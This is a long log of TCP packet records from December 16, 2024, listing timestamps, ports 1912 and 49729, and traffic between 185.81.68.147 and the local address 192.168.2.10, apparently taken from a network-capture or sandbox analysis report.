                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668066025 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668095112 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668103933 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668179989 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668207884 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668227911 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668235064 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668308973 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668335915 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668366909 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668392897 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668488026 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668538094 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668606997 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668632984 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668709040 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668739080 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668807030 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668855906 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.668947935 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669014931 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669209003 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669287920 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669313908 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669341087 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669368029 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669424057 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669450998 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669476986 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669508934 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669555902 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.669672012 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786155939 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786175013 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786273956 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786315918 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786484003 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786706924 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786756992 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786803961 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786853075 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786937952 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.786982059 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787087917 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787190914 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787252903 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787348032 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787364960 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787425041 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787441015 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787446022 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787662029 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787688971 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787825108 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.787839890 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788014889 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788034916 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788106918 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788151979 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788342953 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788355112 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788419962 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788449049 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788530111 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788539886 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788578987 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788589001 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788686991 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788696051 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788734913 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788743973 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788754940 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788882017 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788892984 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788969040 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.788990021 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789083958 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789138079 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789257050 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789268017 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789277077 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789287090 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789355040 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789366007 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789397955 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789447069 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789494991 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789505959 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789525032 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789534092 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789680958 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789691925 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789724112 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789760113 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789808989 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789868116 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789964914 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.789974928 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.790100098 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.790110111 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.790313959 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.790381908 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.907227039 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.907241106 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.907423019 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.907501936 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.907675982 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.907757044 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.907974958 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.907983065 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908040047 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908130884 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908318996 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908329010 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908433914 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908546925 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908632994 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908687115 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908766031 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908811092 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908929110 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.908961058 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909092903 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909123898 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909209013 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909261942 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909421921 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909580946 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909590006 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909663916 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909682989 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909780025 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909790039 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909859896 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.909909964 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910026073 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910080910 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910183907 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910193920 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910311937 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910362005 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910468102 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910512924 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910614967 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910624981 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910758972 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.910804033 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911048889 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911144018 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911154032 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911164045 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911174059 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911381960 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911391020 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911571026 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911581993 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911592007 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911694050 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911705017 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911803007 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911813021 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911935091 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.911946058 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912023067 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912122965 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912132978 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912149906 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912235975 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912252903 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912389040 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912399054 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912466049 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912578106 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912638903 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912647963 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912725925 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912734985 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912817001 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912827015 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912965059 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.912975073 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913037062 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913054943 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913140059 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913209915 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913326025 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913356066 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913444996 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913480043 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913546085 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913577080 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913666010 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913824081 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913832903 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913841963 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913851976 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913889885 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913980007 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.913999081 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914132118 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914218903 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914367914 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914377928 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914386988 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914396048 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914467096 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914477110 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914556026 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914607048 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.914649010 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.938390017 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.938489914 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.938725948 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:09.938798904 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058412075 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058454990 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058465958 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058506966 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058537960 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058587074 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058670044 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058702946 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058784008 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058859110 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058885098 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.058928013 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059058905 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059077024 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059174061 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059191942 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059344053 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059354067 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059365034 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059406996 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059442997 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059511900 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059540033 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059608936 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059628963 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059716940 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059740067 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059824944 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059873104 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.059990883 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060031891 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060261965 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060292006 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060374022 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060439110 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060713053 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060720921 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060729980 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060746908 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060755968 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060873032 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060904980 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060951948 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.060978889 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061075926 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061105013 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061146975 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061201096 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061297894 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061306953 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061369896 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061435938 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061497927 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061530113 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061599970 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061691046 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061728001 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.061990976 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062119007 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062129021 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062138081 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062145948 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:10.062216043 CET191249729185.81.68.147192.168.2.10
